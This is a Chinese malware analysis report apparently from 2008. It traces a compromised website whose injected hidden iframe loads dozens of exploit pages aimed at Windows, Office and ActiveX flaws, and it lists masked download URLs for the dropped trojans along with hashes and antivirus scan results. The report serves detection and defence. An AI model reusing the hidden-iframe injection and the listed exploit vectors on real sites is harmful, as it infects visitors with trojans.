某国菜网利用N个漏洞挂马RootKit.Win32.RESSDT.dr等
该网网页包含代码:
/---
<iframe. src=hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/1.htm width=1 height=0></iframe>
---/
#1 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/1.htm 包含代码:
/---
<iframe. src="ms08001.htm" width=100 height=0></iframe>
<iframe. src="CcXpsp.htm" width=100 height=0></iframe>
<iframe. src="CcIE.htm" width=100 height=0></iframe>
<iframe. src="baidu.htm" width=10 height=0></iframe>
<iframe. src="bfyy.htm" width=10 height=0></iframe>
<iframe. src="cx.htm" width=10 height=0></iframe>
<iframe. src="JetAudio.htm" width=10 height=0></iframe>
<iframe. src="lz.htm" width=10 height=0></iframe>
<iframe. src="Media.htm" width=10 height=0></iframe>
<iframe. src="ms06014.htm" width=10 height=0></iframe>
<iframe. src="ms06042.htm" width=10 height=0></iframe>
<iframe. src="ms07017.htm" width=10 height=0></iframe>
<iframe. src="ms07027.htm" width=10 height=0></iframe>
<iframe. src="ms07033.htm" width=10 height=0></iframe>
<iframe. src="ms07055.htm" width=10 height=0></iframe>
<iframe. src="Office.htm" width=10 height=0></iframe>
<iframe. src="Opera.htm" width=10 height=0></iframe>
<iframe. src="qvld.htm" width=10 height=0></iframe>
<iframe. src="real.htm" width=10 height=0></iframe>
<iframe. src="Baidu.htm" width=10 height=0></iframe>
<iframe. src="Ruising.htm" width=10 height=0></iframe>
<iframe. src="Ruising.htm" width=10 height=0></iframe>
<iframe. src="Thunder.htm" width=10 height=0></iframe>
<iframe. src="TTplayer.htm" width=10 height=0></iframe>
<iframe. src="uc.htm" width=10 height=0></iframe>
<iframe. src="xlkk.htm" width=10 height=0></iframe>
<iframe. src="sinatv.htm" width=10 height=0></iframe>
<iframe. src="icyfox.htm" width=10 height=0></iframe>
<iframe. src="icyfox1.htm" width=10 height=0></iframe>
<iframe. src="jetaudio.htm" width=10 height=0></iframe>
<iframe. src="media.htm" width=10 height=0></iframe>
<iframe. src="bfyy1.htm" width=10 height=0></iframe>
<iframe. src="06014.htm" width=10 height=0></iframe>
<iframe. src="sina.htm" width=10 height=0></iframe>
<iframe. src="08011.htm" width=10 height=0></iframe>
<iframe. src="ls1.htm" width=10 height=0></iframe>
<iframe. src="lsx.htm" width=10 height=0></iframe>
<iframe. src="xunlei5.htm" width=10 height=0></iframe>
<iframe. src="real11.htm" width=10 height=0></iframe>
<iframe. src="office08.htm" width=10 height=0></iframe>
<iframe. src="systrsy.htm" width=10 height=0></iframe>
<iframe. src="hy.htm" width=10 height=0></iframe>
<iframe. src="niu.htm" width=10 height=0></iframe>
<iframe. src="MsVs.htm" width=10 height=0></iframe>
---/
利用 ms06-014漏洞下载 hxxp://ruan*jian2008.cn/xzz.exe
#1.2 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/CcXpsp.htm
利用ms06-014漏洞下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
文件说明符 : D:/test/xzz.exe
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-9-4 16:24:37
修改时间 : 2008-9-4 16:24:38
大小 : 45056 字节 44.0 KB
MD5 : 9f1d0331e7d9bb3e6a14f3d77e354890
SHA1: 78FE5A93EDAFFEA072239A8BE60106B054DB667D
CRC32: 2316933b
文件说明符 : D:/test/xzz.exe
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-9-4 16:24:37
修改时间 : 2008-9-4 16:24:38
大小 : 45056 字节 44.0 KB
MD5 : 9f1d0331e7d9bb3e6a14f3d77e354890
SHA1: 78FE5A93EDAFFEA072239A8BE60106B054DB667D
CRC32: 2316933b
反病毒引擎 | 版本 | 最后更新 | 扫描结果 |
AhnLab-V3 | 2008.9.3.0 | 2008.09.04 | - |
AntiVir | 7.8.1.28 | 2008.09.04 | TR/Dropper.Gen |
Authentium | 5.1.0.4 | 2008.09.03 | W32/Heuristic-KPP!Eldorado |
Avast | 4.8.1195.0 | 2008.09.03 | Win32:Trojan-gen {Other} |
AVG | 8.0.0.161 | 2008.09.03 | Generic11.NRC |
BitDefender | 7.2 | 2008.09.04 | - |
CAT-QuickHeal | 9.50 | 2008.09.02 | - |
ClamAV | 0.93.1 | 2008.09.04 | - |
DrWeb | 4.44.0.09170 | 2008.09.04 | MULDROP.Trojan |
eSafe | 7.0.17.0 | 2008.09.03 | - |
eTrust-Vet | 31.6.6066 | 2008.09.03 | - |
Ewido | 4.0 | 2008.09.03 | - |
F-Prot | 4.4.4.56 | 2008.09.03 | W32/Heuristic-KPP!Eldorado |
F-Secure | 8.0.14332.0 | 2008.09.04 | - |
Fortinet | 3.14.0.0 | 2008.09.03 | - |
GData | 19 | 2008.09.04 | Win32:Trojan-gen |
Ikarus | T3.1.1.34.0 | 2008.09.04 | - |
K7AntiVirus | 7.10.439 | 2008.09.03 | - |
Kaspersky | 7.0.0.125 | 2008.09.04 | - |
McAfee | 5376 | 2008.09.03 | - |
Microsoft | 1.3903 | 2008.09.04 | - |
NOD32v2 | 3413 | 2008.09.04 | - |
Norman | 5.80.02 | 2008.09.03 | W32/Smalldrp.AIHN |
Panda | 9.0.0.4 | 2008.09.03 | Suspicious file |
PCTools | 4.4.2.0 | 2008.09.03 | - |
Prevx1 | V2 | 2008.09.04 | - |
Rising | 20.60.30.00 | 2008.09.04 | RootKit.Win32.RESSDT.dr |
Sophos | 4.33.0 | 2008.09.04 | Mal/Dropper-AB |
Sunbelt | 3.1.1582.1 | 2008.09.02 | - |
Symantec | 10 | 2008.09.04 | Downloader |
TheHacker | 6.3.0.8.072 | 2008.09.04 | - |
TrendMicro | 8.700.0.1004 | 2008.09.04 | - |
VBA32 | 3.12.8.4 | 2008.09.03 | - |
ViRobot | 2008.9.2.1361 | 2008.09.03 | - |
VirusBuster | 4.5.11.0 | 2008.09.03 | - |
Webwasher-Gateway | 6.6.2 | 2008.09.04 | Trojan.Dropper.Gen |
附加信息 |
---|
File size: 45056 bytes |
MD5...: 9f1d0331e7d9bb3e6a14f3d77e354890 |
SHA1..: 78fe5a93edaffea072239a8be60106b054db667d |
SHA256: 55ddfc834c2170e434106f08515bf54ec15522fec51c2e2a7a07bfd182e7233d |
SHA512: 446b2f5a017f28ab441b902975882b146164087aebec12e3f818af07e528c43f 2baf6e3610ef374da195bb591e316088afe88f11d25467bfe8557357f78cbd7c |
PEiD..: Armadillo v1.71 |
TrID..: File type identification Win32 Executable MS Visual C++ (generic) (65.2%) Win32 Executable Generic (14.7%) Win32 Dynamic Link Library (generic) (13.1%) Generic Win/DOS Executable (3.4%) DOS Executable Generic (3.4%) |
PEInfo: PE Structure information ( base data ) entrypointaddress.: 0x40197e timedatestamp.....: 0x48b2db0b (Mon Aug 25 16:17:15 2008) machinetype.......: 0x14c (I386) ( 4 sections ) name viradd virsiz rawdsiz ntrpy md5 .text 0x1000 0xb4a 0x1000 4.79 bae3f2b4fb31bd91eb6b567fc5eaf2f8 .rdata 0x2000 0x79a 0x1000 2.96 c19fb51c229fa86b387eb1bc55d78c2e .data 0x3000 0x184 0x1000 0.66 9195ceb5daf1d9cd01606e8ba9348640 .rsrc 0x4000 0x6f40 0x7000 2.83 6baf7034b48f7e8fa0dcae86e4d44413 ( 5 imports ) > KERNEL32.dll: CreateRemoteThread, GetProcAddress, GetModuleHandleA, WriteProcessMemory, VirtualAllocEx, lstrlenA, OpenProcess, ResumeThread, CreateProcessA, SetThreadPriority, GetCurrentThread, SetPriorityClass, lstrcatA, lstrcpyA, CreateToolhelp32Snapshot, GetShortPathNameA, GetModuleFileNameA, CloseHandle, SetFileTime, WriteFile, GetFileTime, CreateFileA, GlobalFree, LockResource, GlobalAlloc, LoadResource, SizeofResource, FindResourceA, WinExec, Process32First, Process32Next, GetCurrentProcess, GetSystemDirectoryA, Sleep, GetEnvironmentVariableA, GetStartupInfoA > ADVAPI32.dll: RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegQueryValueExA > MFC42.DLL: -, -, -, - > MSVCRT.dll: exit, _acmdln, __getmainargs, tolower, __setusermatherr, _XcptFilter, __p__commode, __p__fmode, __set_app_type, _except_handler3, _controlfp, _exit, _onexit, __dllonexit, _adjust_fdiv, __CxxFrameHandler, _initterm > MSVCP60.dll: __0_Winit@std@@QAE@XZ, __1Init@ios_base@std@@QAE@XZ, __0Init@ios_base@std@@QAE@XZ, __1_Winit@std@@QAE@XZ ( 0 exports ) |
#1.3 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/CcIE.htm
利用ms06-014漏洞下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.4 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/baidu.htm
利用BaiDu工具条(CLSID:{A7F05EE4-0426-454F-8013-C41E3596E9E9})下载hxxp://ruan*jian2008.*k**k*i.com/xzz.exe
#1.5 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/bfyy.htm
利用暴风影音(clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB)漏洞下载 hxxp://ruan*jian2008.*k**k*i.com/4.exe
文件说明符 : D:/test/4.exe
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-9-4 16:43:49
修改时间 : 2008-9-4 16:46:30
大小 : 2222080 字节 2.122 MB
MD5 : 94ac223a30d22e18c24881e7e95728bc
SHA1: 5731768C4240D9912F02DF6AA8352B8F3F803866
CRC32: 7ec6399b
采用文件夹图标
文件 4.rar 接收于 2008.09.04 11:01:42 (CET) 结果: 12/36 (33.34%)
反病毒引擎 | 版本 | 最后更新 | 扫描结果 |
AhnLab-V3 | 2008.9.3.0 | 2008.09.04 | - |
AntiVir | 7.8.1.28 | 2008.09.04 | TR/Hijacker.Gen |
Authentium | 5.1.0.4 | 2008.09.03 | - |
Avast | 4.8.1195.0 | 2008.09.03 | Win32:Trojan-gen {Other} |
AVG | 8.0.0.161 | 2008.09.03 | PSW.Generic6.SCG |
BitDefender | 7.2 | 2008.09.04 | Dropped:Trojan.PWS.QQPass.NEG |
CAT-QuickHeal | 9.50 | 2008.09.02 | - |
ClamAV | 0.93.1 | 2008.09.04 | - |
DrWeb | 4.44.0.09170 | 2008.09.04 | MULDROP.Trojan |
eSafe | 7.0.17.0 | 2008.09.03 | - |
eTrust-Vet | 31.6.6069 | 2008.09.04 | - |
Ewido | 4.0 | 2008.09.03 | - |
F-Prot | 4.4.4.56 | 2008.09.03 | W32/Agent.S.gen!Eldorado |
F-Secure | 8.0.14332.0 | 2008.09.04 | - |
Fortinet | 3.14.0.0 | 2008.09.03 | - |
GData | 19 | 2008.09.04 | - |
Ikarus | T3.1.1.34.0 | 2008.09.04 | Trojan-PWS.Win32.QQPass.pb |
K7AntiVirus | 7.10.439 | 2008.09.03 | - |
Kaspersky | 7.0.0.125 | 2008.09.04 | - |
McAfee | 5376 | 2008.09.03 | - |
Microsoft | 1.3903 | 2008.09.04 | TrojanDropper:Win32/Delfdru.gen!A |
NOD32v2 | 3413 | 2008.09.04 | - |
Norman | 5.80.02 | 2008.09.03 | - |
Panda | 9.0.0.4 | 2008.09.03 | Suspicious file |
PCTools | 4.4.2.0 | 2008.09.03 | - |
Prevx1 | V2 | 2008.09.04 | - |
Rising | 20.60.30.00 | 2008.09.04 | - |
Sophos | 4.33.0 | 2008.09.04 | Mal/Behav-043 |
Sunbelt | 3.1.1592.1 | 2008.08.30 | - |
Symantec | 10 | 2008.09.04 | - |
TheHacker | 6.3.0.8.072 | 2008.09.04 | - |
TrendMicro | 8.700.0.1004 | 2008.09.04 | - |
VBA32 | 3.12.8.4 | 2008.09.02 | MalwareScope.Trojan-PSW.Game.16 |
ViRobot | 2008.9.2.1361 | 2008.09.03 | - |
VirusBuster | 4.5.11.0 | 2008.09.03 | - |
Webwasher-Gateway | 6.6.2 | 2008.09.04 | Trojan.Hijacker.Gen |
附加信息 |
---|
File size: 1836884 bytes |
MD5...: f90b42115323b398c54001a94623b3de |
SHA1..: 81d454d14047adc008d36954c2385d1e0388d7bc |
SHA256: a3edb0fa4d5996ee2d9275c72de6bf980b1fbb223a5d779007f54d8f66cb67b3 |
SHA512: 4096d3f11e30f747f90a7e7027bc50cdfc3b97a892daa24c0c1bbff151c500bb 5a92632320e01aeaf869babb8b48af17eb0c8c595ccfabd940d7f95b1ca2741e |
PEiD..: - |
TrID..: File type identification RAR Archive (83.3%) REALbasic Project (16.6%) |
PEInfo: - |
packers (Kaspersky): UPack |
#1.6 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/cx.htm
利用超星阅读器(clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2)漏洞下载hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.7 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/JetAudio.htm
利用韩国jetAudio播放器ActiveX(clsid:8D1636FD-CA49-4B4E-90E4-0A20E03A15E8)控件漏洞下载hxxp://ruan*jian2008.*k**k*i.com/xzz.exe
#1.8 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/lz.htm
利用联众世界(clsid:61F5C358-60FB-4A23-A312-D2B556620F20)漏洞下载hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.9 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/Media.htm
利用ms07-017漏洞下载 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/wm.cur,hxxp://ruan*jian2008.*k**k*i.com/xzz.exe
#1.13 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/ms07027.htm
利用ms07-027漏洞下载 hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.14 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/ms07033.htm
利用ms07-033漏洞下载 hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.15 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/ms07055.htm
利用ms07-055漏洞下载 hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.16 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/Office.htm
利用Microsoft Office Snapshot Viewer ActiveX(clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9)漏洞下载 hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.17 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/Opera.htm
利用Opera浏览器漏洞下载 hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.18 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/qvld.htm
/---
文件不存在
---/
#1.19 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/real.htm
利用RealPlayer漏洞下载hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.20 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/Ruising.htm
利用瑞星免费在线查毒OL2005.dll ActiveX控件(clsid:E4E2F180-CB8B-4DE9-ACBB-DA745D3BA153)远程代码执行漏洞下载hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.21 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/Thunder.htm
利用迅雷(ThunderServer.webThunder.1)漏洞下载hxxp://ruan*jian2008.*k**k*i.com/xzz.exe
#1.22 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/TTplayer.htm
利用千千静听(TTplayer)ttp_mod.dll(CLSID:89AE5F82-410A-4040-9387-68D1144EFD03)析med文件堆溢出漏洞下载hxxp://ruan*jian2008.*k**k*i.com/xzz.exe
#1.23 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/uc.htm
利用新浪UC(BROWSER2UC.BROWSERToUC)溢出漏洞下载hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.24 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/xlkk.htm
利用迅雷看看(clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F)漏洞下载hxxp://ruan*jian2008.*k**k*i.com/4.exe
#1.25 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/sinatv.htm
利用新浪DLoader Class ActiveX控件(clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A)任意文件下载漏洞下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.26 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/icyfox.htm
下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.27 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/icyfox1.htm
下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.28 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/bfyy1.htm
利用新浪DLoader Class ActiveX控件(clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A)任意文件下载漏洞下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.29 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/08011.htm
利用MS08-011漏洞(Microsoft Office .WPS File Stack Overflow Exploit,clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6)下载 hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.30 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/ls1.htm
利用联众世界(clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69)漏洞下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.31 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/lsx.htm
利用联众世界(clsid:61F5C358-60FB-4A23-A312-D2B556620F20)漏洞下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.32 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/xunlei5.htm
利用迅雷5(clsid:EEDD6FF9-13DE-496B-9A1C-D78B3215E266)漏洞下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.33 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/real11.htm
/---
文件不存在
---/
#1.34 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/office08.htm
利用MS Office Snapshot Viewer ActiveX(snpvw.Snapshot Viewer Control.1) Exploit 下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.35 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/systrsy.htm
下载 hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe,1.exe,2.exe
文件说明符 : D:/test/1.exe
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-8-31 18:15:35
修改时间 : 2008-8-31 18:15:42
大小 : 632832 字节 618.0 KB
MD5 : 83fcf34cef2699f9f29a7906f758e6d6
SHA1: 0C0E3EE9FDBC8355329CD9B5CA9FF82EF373E537
CRC32: 83590948
反病毒引擎 | 版本 | 最后更新 | 扫描结果 |
AhnLab-V3 | 2008.9.2.0 | 2008.09.02 | - |
AntiVir | 7.8.1.23 | 2008.09.01 | TR/Dropper.Gen |
Authentium | 5.1.0.4 | 2008.09.02 | - |
Avast | 4.8.1195.0 | 2008.09.01 | Win32:Monga |
AVG | 8.0.0.161 | 2008.09.01 | Pakes.L |
BitDefender | 7.2 | 2008.09.02 | Trojan.Inject.GO |
CAT-QuickHeal | 9.50 | 2008.08.29 | (Suspicious) - DNAScan |
ClamAV | 0.93.1 | 2008.09.02 | - |
DrWeb | 4.44.0.09170 | 2008.09.01 | - |
eSafe | 7.0.17.0 | 2008.09.01 | - |
eTrust-Vet | 31.6.6062 | 2008.09.01 | - |
Ewido | 4.0 | 2008.09.01 | - |
F-Prot | 4.4.4.56 | 2008.09.02 | W32/Hupigon.O.gen!Eldorado |
F-Secure | 7.60.13501.0 | 2008.09.02 | - |
Fortinet | 3.14.0.0 | 2008.09.02 | W32/Hupigon.GE!tr.bdr |
GData | 19 | 2008.09.02 | - |
Ikarus | T3.1.1.34.0 | 2008.09.02 | Virus.Win32.Virtualizer |
K7AntiVirus | 7.10.435 | 2008.09.01 | - |
Kaspersky | 7.0.0.125 | 2008.09.02 | - |
McAfee | 5374 | 2008.09.01 | - |
Microsoft | 1.3807 | 2008.09.02 | - |
NOD32v2 | 3406 | 2008.09.02 | - |
Norman | 5.80.02 | 2008.09.01 | - |
Panda | 9.0.0.4 | 2008.09.02 | - |
PCTools | 4.4.2.0 | 2008.09.01 | - |
Prevx1 | V2 | 2008.09.02 | - |
Rising | 20.60.10.00 | 2008.09.02 | - |
Sophos | 4.33.0 | 2008.09.02 | Mal/Emogen-E |
Sunbelt | 3.1.1592.1 | 2008.08.30 | VIPRE.Suspicious |
Symantec | 10 | 2008.09.02 | - |
TheHacker | 6.3.0.8.069 | 2008.09.01 | - |
TrendMicro | 8.700.0.1004 | 2008.09.02 | Cryp_Pai-6 |
VBA32 | 3.12.8.4 | 2008.09.01 | - |
ViRobot | 2008.9.1.1359 | 2008.09.01 | - |
VirusBuster | 4.5.11.0 | 2008.09.01 | - |
Webwasher-Gateway | 6.6.2 | 2008.09.01 | Trojan.Dropper.Gen |
附加信息 |
---|
File size: 632832 bytes |
MD5...: 83fcf34cef2699f9f29a7906f758e6d6 |
SHA1..: 0c0e3ee9fdbc8355329cd9b5ca9ff82ef373e537 |
SHA256: f24089c722f0c3a75486880df48be170e7ce158236fa24dcb29104aab095bc86 |
SHA512: c098704adc12aa51c2e58996b5cb4d9a4b7ce8f27e42a49c2e88e5fc1bbf866d 568a990515388f162672a2b1b64de1c83f9deaadf3af4f5ad497aa27afca02f8 |
PEiD..: ASProtect 1.33 - 2.1 Registered -> Alexey Solodovnikov |
TrID..: File type identification Win32 Executable Generic (68.0%) Generic Win/DOS Executable (15.9%) DOS Executable Generic (15.9%) Autodesk FLIC Image File (extensions: flc, fli, cel) (0.0%) |
PEInfo: PE Structure information ( base data ) entrypointaddress.: 0x105c000 timedatestamp.....: 0x41107bc1 (Wed Aug 04 06:01:37 2004) machinetype.......: 0x14c (I386) ( 6 sections ) name viradd virsiz rawdsiz ntrpy md5 0x1000 0x5b000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e 0x5c000 0x5b000 0x58800 8.00 09ddf420c4b737f1fc0fcca9b9814128 .rsrc 0xb7000 0x1000 0x200 4.96 fc7daca374c150fdc7edf901caf58e64 0xb8000 0x1000 0x200 7.60 61676096051219ccea18f55cee2ca4a2 .data 0xb9000 0x42000 0x41800 7.91 1c2377ccc939c0ddb44bab600b4f84a7 .adata 0xfb000 0x1000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e ( 3 imports ) > kernel32.dll: GetProcAddress, GetModuleHandleA, LoadLibraryA > oleaut32.dll: VariantChangeTypeEx > kernel32.dll: RaiseException ( 0 exports ) |
packers (Kaspersky): PE_Patch |
packers (Avast): ASProtect |
文件说明符 : D:/test/2.exe
属性 : A---
数字签名:否
PE文件:是
语言 : 中文(中国)
文件版本 : 6.00.2900.3300 (xpsp.080125-2028)
说明 : Win32 Cabinet Self-Extractor
版权 : (C) Microsoft Corporation. 保留所有权利.
产品版本 : 6.00.2900.3300
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
内部名称 : Wextract
源文件名 : WEXTRACT.EXE
创建时间 : 2008-8-31 18:15:25
修改时间 : 2008-8-31 18:15:33
大小 : 740352 字节 723.0 KB
MD5 : 60ad4121a6309e439b74dc7bb749e553
SHA1: 8793BC8001E902588910C880B2BF77331F075DCE
CRC32: 2334ca4c
内含:5.exe
文件说明符 : D:/test/5.exe
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-7-17 11:1:36
修改时间 : 2008-7-17 11:1:36
大小 : 681984 字节 666.0 KB
MD5 : 457870fa5975fdcf39ceeca5c85948e3
SHA1: E618F83981A32C5FEEA71357287F768C4B786093
CRC32: c887cd8b
反病毒引擎 | 版本 | 最后更新 | 扫描结果 |
AhnLab-V3 | 2008.9.2.0 | 2008.09.02 | - |
AntiVir | 7.8.1.23 | 2008.09.01 | TR/Crypt.XPACK.Gen |
Authentium | 5.1.0.4 | 2008.09.02 | - |
Avast | 4.8.1195.0 | 2008.09.01 | - |
AVG | 8.0.0.161 | 2008.09.01 | - |
BitDefender | 7.2 | 2008.09.02 | MemScan:Trojan.Dropper.Delf.BCB |
CAT-QuickHeal | 9.50 | 2008.08.29 | (Suspicious) - DNAScan |
ClamAV | 0.93.1 | 2008.09.02 | - |
DrWeb | 4.44.0.09170 | 2008.09.01 | - |
eSafe | 7.0.17.0 | 2008.09.01 | - |
eTrust-Vet | 31.6.6062 | 2008.09.01 | - |
Ewido | 4.0 | 2008.09.01 | - |
F-Prot | 4.4.4.56 | 2008.09.02 | - |
F-Secure | 7.60.13501.0 | 2008.09.02 | - |
Fortinet | 3.14.0.0 | 2008.09.02 | - |
GData | 19 | 2008.09.02 | - |
Ikarus | T3.1.1.34.0 | 2008.09.02 | - |
K7AntiVirus | 7.10.435 | 2008.09.01 | - |
Kaspersky | 7.0.0.125 | 2008.09.02 | - |
McAfee | 5374 | 2008.09.01 | - |
Microsoft | 1.3807 | 2008.09.02 | - |
NOD32v2 | 3406 | 2008.09.02 | - |
Norman | 5.80.02 | 2008.09.01 | - |
Panda | 9.0.0.4 | 2008.09.02 | Suspicious file |
PCTools | 4.4.2.0 | 2008.09.01 | - |
Prevx1 | V2 | 2008.09.02 | - |
Rising | 20.60.10.00 | 2008.09.02 | - |
Sophos | 4.33.0 | 2008.09.02 | - |
Sunbelt | 3.1.1592.1 | 2008.08.30 | VIPRE.Suspicious |
Symantec | 10 | 2008.09.02 | - |
TheHacker | 6.3.0.8.069 | 2008.09.01 | - |
TrendMicro | 8.700.0.1004 | 2008.09.02 | - |
VBA32 | 3.12.8.4 | 2008.09.01 | - |
ViRobot | 2008.9.1.1359 | 2008.09.01 | - |
VirusBuster | 4.5.11.0 | 2008.09.01 | - |
Webwasher-Gateway | 6.6.2 | 2008.09.01 | Trojan.Crypt.XPACK.Gen |
附加信息 |
---|
File size: 681984 bytes |
MD5...: 457870fa5975fdcf39ceeca5c85948e3 |
SHA1..: e618f83981a32c5feea71357287f768c4b786093 |
SHA256: f560317472a5c3e5a00c53ae04d2540135cf87406b9cd1229503f1367549193d |
SHA512: fa619305dbd55713d5a640d57d3a15543a1a1afcada8d79dcc00ab57943f203a 3e5e1873576887c0984b0882568cc1050dfef1333adadbd263523a46facfaedb |
PEiD..: ASProtect v1.23 RC1 |
TrID..: File type identification Win32 Executable Generic (58.3%) Win16/32 Executable Delphi generic (14.1%) Generic Win/DOS Executable (13.7%) DOS Executable Generic (13.6%) Autodesk FLIC Image File (extensions: flc, fli, cel) (0.0%) |
PEInfo: PE Structure information ( base data ) entrypointaddress.: 0x401000 timedatestamp.....: 0x2a425e19 (Fri Jun 19 22:22:17 1992) machinetype.......: 0x14c (I386) ( 11 sections ) name viradd virsiz rawdsiz ntrpy md5 0x1000 0x2000 0x1000 7.95 ec55eb6e87785a30fa30184143bc91a0 0x3000 0x1000 0x200 7.57 efaf1a6c55af1485ae16869e097ea013 0x4000 0x1000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e 0x5000 0x1000 0x400 7.81 fcb57e634f692a1157a8d2adfc19daee 0x6000 0x1000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e 0x7000 0x1000 0x200 0.20 467f29e48f3451df774e13adae5aafc2 0x8000 0x1000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e .rsrc 0x9000 0xaa000 0x60c00 8.00 6131b07e586d38ed0f7dbcf304a003fc 0xb3000 0x1000 0x200 7.54 7b2c4b8eca4448745248eb4681bc781d .data 0xb4000 0x44000 0x43e00 7.92 cc009e690231875ddd0d207c233b0c43 .adata 0xf8000 0x1000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e ( 5 imports ) > kernel32.dll: GetProcAddress, GetModuleHandleA, LoadLibraryA > advapi32.dll: GetUserNameA > shell32.dll: ShellExecuteA > oleaut32.dll: VariantChangeTypeEx > kernel32.dll: RaiseException ( 0 exports ) |
packers (Kaspersky): PE_Patch |
packers (F-Prot): Aspack |
#1.36 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/hy.htm(卡巴斯基已检测到: 木马程序 Trojan-Downloader.VBS.Psyme.fd)
利用ms06-014漏洞下载hxxp://ruan*jian2008.*k**k*i.cn/xzz.exe
#1.36.1 hxxp://ruan*jian2008.*k**k*i.cn/ruan/w/huoyan.htm
/---
文件不存在
---/
#1.36.2 hxxp://www.*es**8**6.com/pic/ddb/2006692151148920.gif
/---
文件不存在
---/